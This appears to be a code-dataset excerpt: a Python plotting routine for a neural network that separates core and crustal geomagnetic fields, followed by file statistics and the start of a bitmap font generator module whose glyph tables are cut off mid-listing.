x, y = [self.vmin, self.midpoint, self.vmax], [0.0, 0.5, 1.0]
return np.ma.masked_array(np.interp(value, x, y))
def plot_while_learning(epoch):
# Plot learning curve
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2) # Add 1x2 grid
ax1 = fig.add_subplot(gs[0, :])
# Finalize plots
ax1.clear()
ax1.set_title('Error CN')
ax1.set_xlabel("Epoch")
ax1.set_xlim([np.min(epoch_range),N_epochs])
#ax1.set_ylim([0.0,np.max([E_valid_collect,E_train_collect])])
ax1.grid()
ax1.semilogy(epoch_range, E_train_collect[:,0], '-', color="C0", label = "E training")
ax1.semilogy(epoch_range, E_valid_collect[:,0], '--', color="C0", label = "E validation")
ax1.semilogy(epoch_range, C_train_collect[:,0], '-', color="C1", label = "C training")
ax1.semilogy(epoch_range, C_valid_collect[:,0], '--', color="C1", label = "C validation")
ax1.semilogy(epoch_range, Li_train_collect[:,0], '-', color="C2", label = "Li training")
ax1.semilogy(epoch_range, Li_valid_collect[:,0], '--', color="C2", label = "Li validation")
ax1.semilogy(epoch_range, sat_train_collect[:,0], '-', color="C3", label = "sat training")
ax1.semilogy(epoch_range, sat_valid_collect[:,0], '--', color="C3", label = "sat validation")
ax1.text(0.5, 0.9, "Current lr: " + str(optimizer.param_groups[0]["lr"]),
horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.legend(loc="upper right")
fig.canvas.draw()
fig.savefig('nets/training_sequences/training_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot validation batch RMSE
sat_p = sat_in_v[:,:].permute(1,0).detach().cpu().numpy()
C_op = C_ov[:,:].permute(1,0).detach().cpu().numpy()
Li_op = Li_ov[:,:].permute(1,0).detach().cpu().numpy()
C_lp = C_lv[:,:].permute(1,0).detach().cpu().numpy()
Li_lp = Li_lv[:,:].permute(1,0).detach().cpu().numpy()
# Label
clip_op = Li_op.copy()
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max),:]
clip_lp = Li_lp.copy()
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max),:]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
rmse_v_b = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=1))
rmse_v = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=0))
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2)
ax1 = fig.add_subplot(gs[0, 0])
ax1.clear()
ax1.set_title("Validation sat obs RMSE, mean over batch")
ax1.set_xlabel("[nT]")
ax1.set_ylabel("Count")
ax1.grid()
ax1.hist(rmse_v_b.reshape(-1),bins=21)
ax2 = fig.add_subplot(gs[0, 1])
ax2.clear()
ax2.set_title("Validation sat obs RMSE, mean over obs")
ax2.set_xlabel("[nT]")
ax2.set_ylabel("Count")
ax2.grid()
ax2.hist(rmse_v.reshape(-1),bins=21)
fig.canvas.draw()
fig.savefig('nets/training_sequences/rmse_val_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot training batch RMSE
sat_p = sat_in_t[:,:].permute(1,0).detach().cpu().numpy()
C_op = C_ot[:,:].permute(1,0).detach().cpu().numpy()
Li_op = Li_ot[:,:].permute(1,0).detach().cpu().numpy()
C_lp = C_lt[:,:].permute(1,0).detach().cpu().numpy()
Li_lp = Li_lt[:,:].permute(1,0).detach().cpu().numpy()
# Label
clip_op = Li_op.copy()
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max),:]
clip_lp = Li_lp.copy()
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max),:]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
rmse_v_b = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=1))
rmse_v = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=0))
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2)
ax1 = fig.add_subplot(gs[0, 0])
ax1.clear()
ax1.set_title("Training sat obs RMSE, mean over batch")
ax1.set_xlabel("[nT]")
ax1.set_ylabel("Count")
ax1.grid()
ax1.hist(rmse_v_b.reshape(-1),bins=21)
ax2 = fig.add_subplot(gs[0, 1])
ax2.clear()
ax2.set_title("Training sat obs RMSE, mean over obs")
ax2.set_xlabel("[nT]")
ax2.set_ylabel("Count")
ax2.grid()
ax2.hist(rmse_v.reshape(-1),bins=21)
fig.canvas.draw()
fig.savefig('nets/training_sequences/rmse_tra_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot fit training
fig = plt.figure(figsize=(9,6), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(3, 3) # Add 3x3 grid
ax1 = fig.add_subplot(gs[0, 0], projection=projection)
ax2 = fig.add_subplot(gs[0, 1], projection=projection)
ax12 = fig.add_subplot(gs[0, 2])
ax3 = fig.add_subplot(gs[1, 0], projection=projection)
ax4 = fig.add_subplot(gs[1, 1], projection=projection)
ax34 = fig.add_subplot(gs[1, 2])
ax5 = fig.add_subplot(gs[2, 0], projection=projection)
ax6 = fig.add_subplot(gs[2, 1], projection=projection)
ax56 = fig.add_subplot(gs[2, 2])
sat_p = sat_in_t[0,:].detach().cpu().numpy()
C_op = C_ot[0,:].detach().cpu().numpy()
Li_op = Li_ot[0,:].detach().cpu().numpy()
C_lp = C_lt[0,:].detach().cpu().numpy()
Li_lp = Li_lt[0,:].detach().cpu().numpy()
# Input
ax1.clear()
ax1.set_title("Li+C input obs")
im1 = ax1.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_p, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax1.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax1.axis('off')
# Label
clip_op = Li_op.copy()
#clip_op[:i_n_C] += C_op[:mt_util.shc_vec_len(20)]
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max)]
clip_lp = Li_lp.copy()
#clip_lp[:i_n_C] += C_lp
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max)]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
ax2.clear()
ax2.set_title("Net output obs")
im2 = ax2.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_op, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax2.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax2.axis('off')
ax12.clear()
ax12.set_title("Residuals")
ax12.hist((sat_op-sat_p).reshape(-1),bins=21)
# C Label
#C_lpm = Gr_C@C_lp
C_lpm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_lp[:mt_util.shc_vec_len(n_cut_max)]
ax3.clear()
ax3.set_title("Dynamo simulation core")
im3 = ax3.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax3.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax3.axis('off')
# C output
C_opm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_op[:mt_util.shc_vec_len(n_cut_max)]
#C_opm = Gr_C@C_op
ax4.clear()
ax4.set_title("Net output shc core")
im4 = ax4.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax4.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax4.axis('off')
ax34.clear()
ax34.set_title("Residuals")
ax34.hist((C_opm-C_lpm).reshape(-1),bins=21)
# Li Label
Li_lpm = Gr_Li@Li_lp
ax5.clear()
ax5.set_title("Crustal lith")
im5 = ax5.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax5.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax5.axis('off')
# Li output
Li_opm = Gr_Li@Li_op
ax6.clear()
ax6.set_title("Net output shc lith")
im6 = ax6.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax6.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax6.axis('off')
ax56.clear()
ax56.set_title("Residuals")
ax56.hist((Li_opm-Li_lpm).reshape(-1),bins=21)
# End
fig.canvas.draw()
fig.savefig('nets/training_sequences/fit_test_tra_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot fit
fig = plt.figure(figsize=(9,6), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(3, 3) # Add 3x3 grid
ax1 = fig.add_subplot(gs[0, 0], projection=projection)
ax2 = fig.add_subplot(gs[0, 1], projection=projection)
ax12 = fig.add_subplot(gs[0, 2])
ax3 = fig.add_subplot(gs[1, 0], projection=projection)
ax4 = fig.add_subplot(gs[1, 1], projection=projection)
ax34 = fig.add_subplot(gs[1, 2])
ax5 = fig.add_subplot(gs[2, 0], projection=projection)
ax6 = fig.add_subplot(gs[2, 1], projection=projection)
ax56 = fig.add_subplot(gs[2, 2])
sat_p = sat_in_v[0,:].detach().cpu().numpy()
C_op = C_ov[0,:].detach().cpu().numpy()
Li_op = Li_ov[0,:].detach().cpu().numpy()
C_lp = C_lv[0,:].detach().cpu().numpy()
Li_lp = Li_lv[0,:].detach().cpu().numpy()
# Input
ax1.clear()
ax1.set_title("Li+C input obs")
im1 = ax1.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_p, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax1.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax1.axis('off')
# Label
clip_op = Li_op.copy()
#clip_op[:i_n_C] += C_op[:mt_util.shc_vec_len(20)]
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max)]
clip_lp = Li_lp.copy()
#clip_lp[:i_n_C] += C_lp
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max)]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
ax2.clear()
ax2.set_title("Net output obs")
im2 = ax2.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_op, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax2.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax2.axis('off')
ax12.clear()
ax12.set_title("Residuals")
ax12.hist((sat_op-sat_p).reshape(-1),bins=21)
# C Label
#C_lpm = Gr_C@C_lp
C_lpm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_lp[:mt_util.shc_vec_len(n_cut_max)]
ax3.clear()
ax3.set_title("Dynamo simulation core")
im3 = ax3.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax3.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax3.axis('off')
# C output
C_opm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_op[:mt_util.shc_vec_len(n_cut_max)]
#C_opm = Gr_C@C_op
ax4.clear()
ax4.set_title("Net output shc core")
im4 = ax4.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax4.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax4.axis('off')
ax34.clear()
ax34.set_title("Residuals")
ax34.hist((C_opm-C_lpm).reshape(-1),bins=21)
# Li Label
Li_lpm = Gr_Li@Li_lp
ax5.clear()
ax5.set_title("Crustal lith")
im5 = ax5.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax5.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax5.axis('off')
# Li output
Li_opm = Gr_Li@Li_op
ax6.clear()
ax6.set_title("Net output shc lith")
im6 = ax6.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax6.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax6.axis('off')
ax56.clear()
ax56.set_title("Residuals")
ax56.hist((Li_opm-Li_lpm).reshape(-1),bins=21)
# End
fig.canvas.draw()
fig.savefig('nets/training_sequences/fit_test_val_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# P spec
C_op = C_ot[:5,:].detach().cpu().numpy()
Li_op = Li_ot[:5,:].detach().cpu().numpy()
C_lp = C_lt[:5,:].detach().cpu().numpy()
Li_lp = Li_lt[:5,:].detach().cpu().numpy()
nmax_pairs = np.ones(5,dtype=int)*int(n_max_C)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(C_op, clip.r_cmb, n_max_C, g_spec_compares = C_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'C_test_tra_{}'.format(epoch),
save_folder="nets/training_sequences/")
nmax_pairs = np.ones(5,dtype=int)*int(n_max_Li)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(Li_op, clip.a, n_max_Li, g_spec_compares = Li_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'Li_test_tra_{}'.format(epoch),
save_folder="nets/training_sequences/")
# P spec
C_op = C_ov[:5,:].detach().cpu().numpy()
Li_op = Li_ov[:5,:].detach().cpu().numpy()
C_lp = C_lv[:5,:].detach().cpu().numpy()
Li_lp = Li_lv[:5,:].detach().cpu().numpy()
nmax_pairs = np.ones(5,dtype=int)*int(n_max_C)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(C_op, clip.r_cmb, n_max_C, g_spec_compares = C_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'C_test_val_{}'.format(epoch),
save_folder="nets/training_sequences/")
nmax_pairs = np.ones(5,dtype=int)*int(n_max_Li)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(Li_op, clip.a, n_max_Li, g_spec_compares = Li_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'Li_test_val_{}'.format(epoch),
save_folder="nets/training_sequences/")
| 41.648515
| 142
| 0.618507
| 2,691
| 16,826
| 3.634708
| 0.091044
| 0.007361
| 0.040078
| 0.031899
| 0.884061
| 0.854514
| 0.833044
| 0.81372
| 0.785911
| 0.736632
| 0
| 0.062045
| 0.207833
| 16,826
| 404
| 143
| 41.648515
| 0.671768
| 0.073101
| 0
| 0.738095
| 0
| 0
| 0.071553
| 0.018918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010204
| false
| 0
| 0.020408
| 0
| 0.037415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56b35093e2b3e86d6799846ab396840e9a2e1743
| 14,179
|
py
|
Python
|
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | 3
|
2022-02-24T15:46:43.000Z
|
2022-03-30T13:17:03.000Z
|
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | null | null | null |
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | null | null | null |
notice ="""
Font Generator Program
-----------------------------------
| Copyright 2022 by Joel C. Alcarez |
| [joelalcarez1975@gmail.com] |
|-----------------------------------|
| We make absolutely no warranty |
| of any kind, expressed or implied |
|-----------------------------------|
| Contact primary author |
| if you plan to use this |
| in a commercial product at |
| joelalcarez1975@gmail.com |
-----------------------------------
"""
def get8x8charpatterns() -> dict:#add characters as needed some ascii chars not present
return {' ':[0,0,0,0,0,0,0,0],
'0':[0x7C,0xC6,0xCE,0xDE,0xF6,0xE6,0x7C,0x00],
'1':[0x30,0x70,0x30,0x30,0x30,0x30,0xFC,0x00],
'2':[0x78,0xCC,0x0C,0x38,0x60,0xCC,0xFC,0x00],
'3':[0x78,0xCC,0x0C,0x38,0x0C,0xCC,0x78,0x00],
'4':[0x1C,0x3C,0x6C,0xCC,0xFE,0x0C,0x1E,0x00],
'5':[0xFC,0xC0,0xF8,0x0C,0x0C,0xCC,0x78,0x00],
'6':[0x38,0x60,0xC0,0xF8,0xCC,0xCC,0x78,0x00],
'7':[0xFC,0xCC,0x0C,0x18,0x30,0x30,0x30,0x00],
'8':[0x78,0xCC,0xCC,0x78,0xCC,0xCC,0x78,0x00],
'9':[0x78,0xCC,0xCC,0x7C,0x0C,0x18,0x70,0x00],
'A':[0x30,0x78,0xCC,0xCC,0xFC,0xCC,0xCC,0x00],
'B':[0xFC,0x66,0x66,0x7C,0x66,0x66,0xFC,0x00],
'C':[0x3C,0x66,0xC0,0xC0,0x66,0x66,0x3C,0x00],
'D':[0xF8,0x6C,0x66,0x66,0x66,0x6C,0xF8,0x00],
'E':[0xFE,0x62,0x68,0x78,0x68,0x62,0xFE,0x00],
'F':[0xFE,0x62,0x68,0x78,0x68,0x60,0xF0,0x00],
'G':[0x3C,0x66,0xC0,0xC0,0xCE,0x66,0x3E,0x00],
'H':[0xCC,0xCC,0xCC,0xFC,0xCC,0xCC,0xCC,0x00],
'I':[0x78,0x30,0x30,0x30,0x30,0x30,0x78,0x00],
'J':[0x1E,0x0C,0x0C,0x0C,0xCC,0xCC,0x78,0x00],
'K':[0xE6,0x66,0x6C,0x78,0x6C,0x66,0xE6,0x00],
'L':[0xF0,0x60,0x60,0x60,0x62,0x66,0xFE,0x00],
'M':[0xC6,0xEE,0xFE,0xFE,0xD6,0xC6,0xC6,0x00],
'N':[0xC6,0xE6,0xF6,0xDE,0xCE,0xC6,0xC6,0x00],
'O':[0x38,0x6C,0xC6,0xC6,0xC6,0x6C,0x38,0x00],
'P':[0xFC,0x66,0x66,0x7C,0x60,0x60,0xF0,0x00],
'Q':[0x78,0xCC,0xCC,0xCC,0xDC,0x78,0x1C,0x00],
'R':[0xFC,0x66,0x66,0x7C,0x6C,0x66,0xE6,0x00],
'S':[0x78,0xCC,0xE0,0x70,0x1C,0xCC,0x78,0x00],
'T':[0xFC,0xB4,0x30,0x30,0x30,0x30,0x78,0x00],
'U':[0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0x7C,0x00],
'V':[0xCC,0xCC,0xCC,0xCC,0xCC,0x78,0x30,0x00],
'W':[0xC6,0xC6,0xC6,0xD6,0xFE,0xEE,0xC6,0x00],
'X':[0xC6,0xC6,0x6C,0x38,0x38,0x6C,0xC6,0x00],
'Y':[0xCC,0xCC,0xCC,0x78,0x30,0x30,0x78,0x00],
'Z':[0xFE,0xC6,0x8C,0x18,0x32,0x66,0xFE,0x00],
'a':[0x00,0x00,0x78,0x0C,0x7C,0xCC,0x76,0x00],
'b':[0xE0,0x60,0x60,0x7C,0x66,0x66,0xDC,0x00],
'c':[0x00,0x00,0x78,0xCC,0xC0,0xCC,0x78,0x00],
'd':[0x1C,0x0C,0x0C,0x7C,0xCC,0xCC,0x76,0x00],
'e':[0x00,0x00,0x78,0xCC,0xFC,0xC0,0x78,0x00],
'f':[0x38,0x6C,0x60,0xF0,0x60,0x60,0xF0,0x00],
'g':[0x00,0x00,0x76,0xCC,0xCC,0x7C,0x0C,0xF8],
'h':[0xE0,0x60,0x6C,0x76,0x66,0x66,0xE6,0x00],
'i':[0x30,0x00,0x70,0x30,0x30,0x30,0x78,0x00],
'j':[0x0C,0x00,0x0C,0x0C,0x0C,0xCC,0xCC,0x78],
'k':[0xE0,0x60,0x66,0x6C,0x78,0x6C,0xE6,0x00],
'l':[0x70,0x30,0x30,0x30,0x30,0x30,0x78,0x00],
'm':[0x00,0x00,0xCC,0xFE,0xFE,0xD6,0xC6,0x00],
'n':[0x00,0x00,0xF8,0xCC,0xCC,0xCC,0xCC,0x00],
'o':[0x00,0x00,0x78,0xCC,0xCC,0xCC,0x78,0x00],
'p':[0x00,0x00,0xDC,0x66,0x66,0x7C,0x60,0xF0],
'q':[0x00,0x00,0x76,0xCC,0xCC,0x7C,0x0C,0x1E],
'r':[0x00,0x00,0xDC,0x76,0x66,0x60,0xF0,0x00],
's':[0x00,0x00,0x7C,0xC0,0x78,0x0C,0xF8,0x00],
't':[0x10,0x30,0x7C,0x30,0x30,0x34,0x18,0x00],
'u':[0x00,0x00,0xCC,0xCC,0xCC,0xCC,0x76,0x00],
'v':[0x00,0x00,0xCC,0xCC,0xCC,0x78,0x30,0x00],
'w':[0x00,0x00,0xC6,0xD6,0xFE,0xFE,0x6C,0x00],
'x':[0x00,0x00,0xC6,0x6C,0x38,0x6C,0xC6,0x00],
'y':[0x00,0x00,0xCC,0xCC,0xCC,0x7C,0x0C,0xF8],
'z':[0x00,0x00,0xFC,0x98,0x30,0x64,0xFC,0x00],
'<':[0x18,0x30,0x60,0xC0,0x60,0x30,0x18,0x00],
'>':[0x60,0x30,0x18,0x0C,0x18,0x30,0x60,0x00],
"(":[0x18,0x30,0x60,0x60,0x60,0x30,0x18,0x00],
")":[0x60,0x30,0x18,0x18,0x18,0x30,0x60,0x00],
'[':[0x78,0x60,0x60,0x60,0x60,0x60,0x78,0x00],
']':[0x78,0x18,0x18,0x18,0x18,0x18,0x78,0x00],
'{':[0x1C,0x30,0x30,0xE0,0x30,0x30,0x1C,0x00],
'}':[0xE0,0x30,0x30,0x1C,0x30,0x30,0xE0,0x00],
'.':[0x00,0x00,0x00,0x00,0x00,0x30,0x30,0x00],
",":[0x00,0x00,0x00,0x00,0x00,0x30,0x30,0x60],
'!':[0x30,0x78,0x78,0x30,0x30,0x00,0x30,0x00],
'?':[0x78,0xCC,0x0C,0x18,0x30,0x00,0x30,0x00],
':':[0x00,0x30,0x30,0x00,0x00,0x30,0x30,0x00],
';':[0x00,0x30,0x30,0x00,0x00,0x30,0x30,0x60],
'"':[0x6C,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00],
"'":[0x60,0x60,0xC0,0x00,0x00,0x00,0x00,0x00],
'`':[0x30,0x30,0x18,0x00,0x00,0x00,0x00,0x00],
'#':[0x6C,0x6C,0xFE,0x6C,0xFE,0x6C,0x6C,0x00],
'%':[0x00,0xC6,0xCC,0x18,0x30,0x66,0xC6,0x00],
'$':[0x30,0x7C,0xC0,0x78,0x0C,0xF8,0x30,0x00],
'&':[0x38,0x6C,0x38,0x76,0xDC,0xCC,0x76,0x00],
'@':[0x7C,0xC6,0xDE,0xDE,0xDE,0xC0,0x78,0x00],
"*":[0x00,0x66,0x3C,0xFF,0x3C,0x66,0x00,0x00],
"+":[0x00,0x30,0x30,0xFC,0x30,0x30,0x00,0x00],
'-':[0x00,0x00,0x00,0xFC,0x00,0x00,0x00,0x00],
'/':[0x06,0x0C,0x18,0x30,0x60,0xC0,0x80,0x00],
'\\':[0xC0,0x60,0x30,0x18,0x0C,0x06,0x02,0x00],
'=':[0x00,0x00,0xFC,0x00,0x00,0xFC,0x00,0x00],
'^':[0x10,0x38,0x6C,0xC6,0x00,0x00,0x00,0x00],
'_':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF],
'|':[0x18,0x18,0x18,0x00,0x18,0x18,0x18,0x00],
'~':[0x76,0xDC,0x00,0x00,0x00,0x00,0x00,0x00]
}
def get8x14charpatterns() -> dict:#add characters as needed some ascii chars not present
return {' ':[0,0,0,0,0,0,0,0,0,0,0,0,0,0],
'!':[0x00,0x00,0x18,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x18,0x00,0x00,0x00],
'"':[0x00,0x66,0x66,0x66,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'#':[0x00,0x00,0x6C,0x6C,0xFE,0x6C,0x6C,0x6C,0xFE,0x6C,0x6C,0x00,0x00,0x00],
'$':[0x00,0x10,0x7C,0xD6,0xD0,0xD0,0x7C,0x16,0x16,0xD6,0x7C,0x10,0x00,0x00],
'%':[0x00,0x00,0x00,0x00,0xC2,0xC4,0x08,0x10,0x20,0x46,0x86,0x00,0x00,0x00],
'&':[0x00,0x00,0x38,0x6C,0x6C,0x38,0x76,0xDC,0xCC,0xCC,0x76,0x00,0x00,0x00],
"'":[0x00,0x30,0x30,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'(':[0x00,0x00,0x0C,0x18,0x30,0x30,0x30,0x30,0x30,0x18,0x0C,0x00,0x00,0x00],
')':[0x00,0x00,0x30,0x18,0x0C,0x0C,0x0C,0x0C,0x0C,0x18,0x30,0x00,0x00,0x00],
'*':[0x00,0x00,0x00,0x00,0x66,0x3C,0xFF,0x3C,0x66,0x00,0x00,0x00,0x00,0x00],
'+':[0x00,0x00,0x00,0x00,0x18,0x18,0x7E,0x18,0x18,0x00,0x00,0x00,0x00,0x00],
',':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1C,0x18,0x30,0x00,0x00],
'-':[0x00,0x00,0x00,0x00,0x00,0x00,0xFC,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'.':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00],
'/':[0x00,0x00,0x02,0x06,0x0C,0x18,0x30,0x60,0xC0,0x80,0x00,0x00,0x00,0x00],
'0':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xD6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'1':[0x00,0x00,0x18,0x38,0x18,0x18,0x18,0x18,0x18,0x18,0x7E,0x00,0x00,0x00],
'2':[0x00,0x00,0x7C,0xC6,0x06,0x0C,0x18,0x30,0x60,0xC0,0xFE,0x00,0x00,0x00],
'3':[0x00,0x00,0x7C,0xC6,0x06,0x06,0x3C,0x06,0x06,0xC6,0x7C,0x00,0x00,0x00],
'4':[0x00,0x00,0x0C,0x1C,0x3C,0x6C,0xCC,0xFE,0x0C,0x0C,0x0C,0x00,0x00,0x00],
'5':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0x06,0x06,0xC6,0x7C,0x00,0x00,0x00],
'6':[0x00,0x00,0x3C,0x60,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'7':[0x00,0x00,0xFE,0x06,0x06,0x0C,0x18,0x30,0x30,0x30,0x30,0x00,0x00,0x00],
'8':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0x7C,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'9':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x0C,0x78,0x00,0x00,0x00],
':':[0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x00],
';':[0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x18,0x18,0x30,0x00,0x00,0x00],
'<':[0x00,0x00,0x06,0x0C,0x18,0x30,0x60,0x30,0x18,0x0C,0x06,0x00,0x00,0x00],
'=':[0x00,0x00,0x00,0x00,0x00,0x7E,0x00,0x00,0x7E,0x00,0x00,0x00,0x00,0x00],
'>':[0x00,0x00,0x60,0x30,0x18,0x0C,0x06,0x0C,0x18,0x30,0x60,0x00,0x00,0x00],
'?':[0x00,0x00,0x7C,0xC6,0x06,0x0C,0x18,0x18,0x18,0x00,0x00,0x18,0x00,0x00],
